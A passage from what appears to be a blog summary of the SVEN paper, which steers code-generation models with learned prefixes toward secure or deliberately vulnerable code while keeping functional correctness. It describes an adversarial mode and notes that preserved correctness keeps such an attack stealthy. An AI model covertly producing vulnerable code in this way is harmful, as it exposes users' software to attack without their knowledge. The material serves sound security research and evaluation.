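hardening), and how to rigorously evaluate their robustness under malicious steering (adversarial testing). The paper addresses both with a new task called controlled code generation. The task takes a binary security property as a parameter and steers the model to generate secure or unsafe code without harming functional correctness. To solve it, the authors propose a learning framework called SVEN. SVEN learns property-specific continuous vectors that guide code generation without modifying the base model's weights, which makes security control efficient and flexible. Experiments show that SVEN achieves strong control: it raises the share of secure code generated by a state-of-the-art 2.7B-parameter CodeGen model from 59.1% to 92.3%, and in adversarial testing it lowers that share to 36.8%, while functional correctness stays very close to the original language model.<br><img src="/images/sven/1.png" alt="Figure 1: A conceptual visualization of our objective for security hardening and adversarial testing."></p><h2 id="背景与动机">Background and Motivation</h2><h3 id="1-代码生成模型的兴起与安全隐患">1. The Rise of Code Generation Models and Their Security Risks</h3><p>Following their success in natural language, LLMs pretrained on large code corpora (such as Codex and CodeGen) can generate functionally complex code snippets from natural-language descriptions, which greatly improves development efficiency. Their training objective, however, is mainly to learn the syntax and functional patterns of code, and the training data inevitably contains a large amount of unsafe code with known or unknown vulnerabilities. The models therefore lack any built-in "security awareness": they reproduce unsafe patterns indiscriminately and frequently produce code with common vulnerabilities such as SQL injection and buffer overflows. This makes deployment risky in practice, especially in security-sensitive settings.</p><h3 id="2-现有安全研究的局限性">2. 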
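Limitations of Existing Security Research</h3><p>Existing work on the security of code models falls into two directions, and both have shortcomings. Security hardening work (such as rule-based secure prompts or post-processing filters on generated code) tends to rely on static, fixed knowledge, generalizes poorly, and easily hurts the functional correctness of the generated code. Security evaluation work mostly relies on a limited set of test cases or simple malicious prompts. It lacks systematic, adaptive methods for probing the model's security boundary, so it cannot fully assess real robustness against targeted attacks. The two directions are usually studied in isolation, and no unified framework delivers both effective security improvement and rigorous security evaluation.</p><h3 id="3-本文的动机与核心思路">3. Motivation and Core Idea</h3><p>Given this gap, the paper's core question is: can a unified, parameterized framework steer a model's security property in a controllable way, and thereby connect security hardening with adversarial testing? The authors propose the controlled code generation task. Its key requirement is that the steering be precise (it significantly changes the security property), faithful (it does not affect functional correctness), and efficient (it does not require retraining the large model). To meet this requirement they propose the SVEN framework. Its core idea is to learn a lightweight, pluggable "security steering module" that uses property-specific continuous vectors to influence the model's generation probability distribution at inference time. The module is trained with a carefully constructed dataset and specialized loss functions. With this design the model can be "hardened" into a secure version or, from the attacker's perspective, "weakened" into an unsafe version, so a single framework both improves the defense and measures how far it can be broken. This offers a new perspective and a new tool for understanding and securing code generation models.</p><h2 id="主要挑战">Main Challenges</h2><h3 id="c1:模块化-challenge-i-modularity">C1: Modularity (Challenge I)</h3><p>Because existing LLMs have so many parameters, re-pretraining or fine-tuning them (that is, modifying all model weights) is too expensive. The goal is therefore to train a separate, pluggable module that provides security control without overwriting or modifying the base model's weights. Since high-quality vulnerability data is hard to obtain, the method must also train efficiently on a small amount of data.</p><h3 id="c2:功能正确性与安全控制的权衡-challenge-ii-functional-correctness-vs-security-control">C2: Functional Correctness vs. Security Control (Challenge II)</h3><p>Security control must preserve the model's ability to generate <strong>functionally correct code</strong>. For security hardening, this keeps the model useful. For adversarial testing, preserving functional correctness is essential to the <strong>stealth</strong> of the attack. A model that is controllable but functionally badly degraded has almost no practical value, because end users will notice and abandon it. The core challenge is to design a training mechanism that achieves both strong security control and high functional correctness.</p><h3 id="c3:确保高质量训练数据-challenge-iii-ensuring-high-quality-training-data">C3: Ensuring High-quality Training Data (Challenge III)</h3><p>The quality of the training data is critical. The data must match the code completion setting, generalize, and precisely capture real security-fix logic. To keep the model from learning irrelevant code patterns, unrelated changes such as refactoring or functional modifications must be excluded. Some vulnerability datasets already exist, but they are not fully suited to this task, and some have serious quality problems. The authors therefore analyze how suitable the existing datasets are and build high-quality training data on that basis.</p><h2 id="sven的设计与实现">Design and Implementation of SVEN</h2><h3 id="1-核心架构:模块化的连续前缀引导">1. Core Architecture: Modular Continuous-Prefix Steering</h3><p>At its core, SVEN is a <strong>lightweight</strong>, <strong>pluggable</strong> adapter method. It leaves the weights of the base LLM completely unchanged and learns, for each security property (secure or unsafe), a <strong>property-specific sequence of continuous vectors (a "prefix")</strong> that provides the control. At generation time, the prefix for the desired property is fed to the model as <strong>initial hidden states</strong>. Through the attention mechanism it influences the computation of all subsequent hidden states, and so "prompts" the model, in continuous representation space, to generate code with the target property. Because the prefixes have very few parameters (about 0.1% of the base model), SVEN is modular and efficient to train and deploy.</p><h3 id="2-训练策略:分区域优化以实现双重目标">2. 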
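Training Strategy: Region-Specific Optimization for the Dual Objective</h3><p>To balance security control against preserving functional correctness, SVEN trains with specialized loss functions that apply to different regions of the code:</p><ul><li>In the security-fix data used for training (pairs of vulnerable code and fixed code), the <strong>changed regions</strong> are decisive for the security property, while the <strong>unchanged regions</strong> are neutral.</li><li>On the changed regions, a <strong>conditional language modeling loss</strong> and a <strong>secure-versus-vulnerable contrastive loss</strong> strengthen the model's ability to generate code with the target property.</li><li>On the unchanged regions, a loss based on KL divergence constrains the next-token distribution produced with the prefix to stay close to that of the original model, which <strong>preserves the model's original functional correctness</strong>.</li></ul><h3 id="3-数据基础:高质量-精筛选的训练集">3. Data Foundation: A High-Quality, Carefully Curated Training Set</h3><p>SVEN's effectiveness depends on high-quality data. The paper points out that existing vulnerability datasets either <strong>generalize poorly</strong> or <strong>mix in unrelated code changes</strong>. The authors therefore <strong>manually reviewed and refined</strong> several open-source datasets and built a dedicated dataset that is small (about 1.6k program pairs) but of <strong>very high quality</strong>. Experiments show that this small dataset clearly outperforms a baseline trained on roughly 19 times more data that was included without quality filtering, which illustrates that <strong>data quality matters more than quantity</strong>.</p><h3 id="4-关键特性与效果">4. Key Properties and Results</h3><ul><li><strong>Strong security control</strong>: on the 2.7B-parameter CodeGen model, security hardening raises the share of secure generated code from the 59.1% baseline to 92.3%, and adversarial testing lowers it to 36.8%.</li></ul><h2 id="实验设置">Experimental Setup</h2><p>The paper evaluates SVEN systematically on two aspects: <strong>security control</strong> and <strong>functional correctness</strong>.</p><h3 id="1-评估任务与目标">1. Evaluation Tasks and Goals</h3><p>The experiments center on the controlled code generation task and evaluate two dimensions:</p><ul><li><p><strong>Security hardening</strong>: whether SVEN can steer the model to generate more secure code.</p></li><li><p><strong>Adversarial testing</strong>: whether SVEN can steer the model to generate more unsafe code (used to evaluate the robustness of the protection).<br>All experiments are run under the constraint of <strong>preserving the model's original functional correctness</strong>.</p></li></ul><h3 id="2-评估数据集与漏洞选择">2. Evaluation Dataset and Vulnerability Selection</h3><p>To make the evaluation comprehensive and realistic, the paper builds a high-quality test set:</p><ul><li><strong>Vulnerability types</strong>: <strong>9 critical and common CWEs</strong>, namely:<ul><li>SQL injection (CWE-89)</li><li>Path traversal (CWE-22)</li><li>OS command injection (CWE-78)</li><li>Cross-site scripting (CWE-79)</li><li>Out-of-bounds read and write (CWE-125, CWE-787)</li><li>NULL pointer dereference (CWE-476)</li><li>Integer overflow (CWE-190)</li><li>Use after free (CWE-416)</li></ul></li><li><strong>Scenario design</strong>: each CWE has <strong>several different code scenarios</strong> (18 test scenarios in total) in Python and C, to simulate real programming tasks.</li><li><strong>Data split</strong>: the scenarios under each CWE are further split into a test set and a validation set, so that the model does not overfit to specific code snippets.</li></ul><h3 id="3-基线模型与目标模型">3. Baseline and Target Models</h3><ul><li><strong>Base models</strong>: the experiments mainly use the CodeGen family at several sizes (350M, 2.7B, and 6.1B parameters) to check that the method works across model capacities.</li><li><strong>Comparison baseline</strong>: the <strong>original CodeGen models without any security control</strong> serve as the main baseline.</li></ul><h3 id="4-评估指标">4. 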
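Evaluation Metrics</h3><ul><li><strong>Security rate</strong>: the percentage of secure samples among all samples the model generates for a given vulnerability scenario. This is the core metric for security control.</li></ul><p><img src="/images/sven/figure10.png" alt="Figure 10: Security rate on individual scenarios of our main CWEs. The base model is CodeGen-2.7B. The temperature is 0.4."></p><ul><li><strong>Functional correctness</strong>: pass@k scores on the HumanEval benchmark, used to check whether security control degrades the functional correctness of the generated code.<br><img src="/images/sven/table3.png" alt="Table 3: Comparison between CodeGen LMs [57] and SVEN on the ability to generate functionally correct code, measured by pass@𝑘 scores on the HumanEval benchmark [26]."></li></ul><h3 id="5-实验配置">5. Experiment Configuration</h3><ul><li><p><strong>Decoding temperature</strong>: to check that the method is stable under different amounts of sampling randomness, the experiments use <strong>two temperatures</strong>: <strong>0.4</strong> (a balance between diversity and determinism) and <strong>0.1</strong> (highly deterministic, low randomness).<br><img src="/images/sven/figure-7-8-9.png" alt="figure7-8-9"></p></li><li><p><strong>Control mechanism</strong>: switching between the <strong>secure prefix</strong> and the <strong>unsafe prefix</strong> learned by SVEN lets the same base model run in either <strong>security hardening</strong> or <strong>adversarial testing</strong> mode.</p></li></ul><h2 id="总结">Summary</h2><p>This work addresses the problem that code-generation LLMs frequently produce unsafe code and proposes a controllable way to study their security. By defining the <strong>controlled code generation</strong> task, it brings <strong>security hardening</strong> and <strong>adversarial testing</strong> into a single framework. To solve the task, the paper designs SVEN, a lightweight solution built on three elements:</p><ul><li>1) <strong>Modular architecture</strong>: property-specific continuous prefixes steer generation without modifying the large model's weights;</li><li>2) <strong>Targeted training strategy</strong>: region-specific loss functions strengthen security control on the changed regions of the code and preserve functional correctness on the unchanged regions;</li><li>3) <strong>High-quality data</strong>: a dedicated, manually refined dataset underpins the method's effectiveness.</li></ul><p>The experimental evaluation shows that SVEN gives switch-like control: on a test set covering several high-risk CWEs, it <strong>significantly raises or lowers the model's security rate</strong> (for the 2.7B CodeGen model, from 59.1% up to 92.3% or down to 36.8%) while almost fully preserving the model's original functional correctness. The work offers a practical path to improving the security of existing AI coding assistants. More importantly, it establishes a systematic adversarial evaluation benchmark for code models under the strict constraint of preserved functional correctness.</p><h2 id="研究的局限性和未来方向">Limitations and Future Directions</h2><p>Although the work proposes a novel framework, it has several limitations, and these point to worthwhile future work:</p><ul><li><ol><li><strong>Limited generalization</strong>: SVEN's effectiveness has so far been validated mainly on specific CWEs in Python and C/C++. For <strong>vulnerability types not covered by the training data and for other programming languages</strong>, its control may weaken. Future work needs <strong>more comprehensive and diverse security-fix datasets</strong>, which could be expanded with automated security analysis tools or crowdsourcing platforms.</li></ol></li><li><ol start="2"><li>…</li></ol></li></ul><script src="https://giscus.app/client.js" 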
data-repo="zer0ptr/zer0ptr.github.io" data-repo-id="R_kgDOQ7_WQA" data-category="General" data-category-id="DIC_kwDOQ7_WQM4C1Wz2" data-mapping="pathname" data-strict="0" data-reactions-enabled="1" data-emit-metadata="0" data-input-position="bottom" data-theme="dark_protanopia" data-lang="en" crossorigin="anonymous" async></script>]]></content>
<categories>
<category> LLM </category>
</categories>
<tags>
<tag> LLM </tag>
<tag> Code Generation </tag>
<tag> LLM Security </tag>
<tag> Prefix Tuning </tag>
</tags>
</entry>
</search>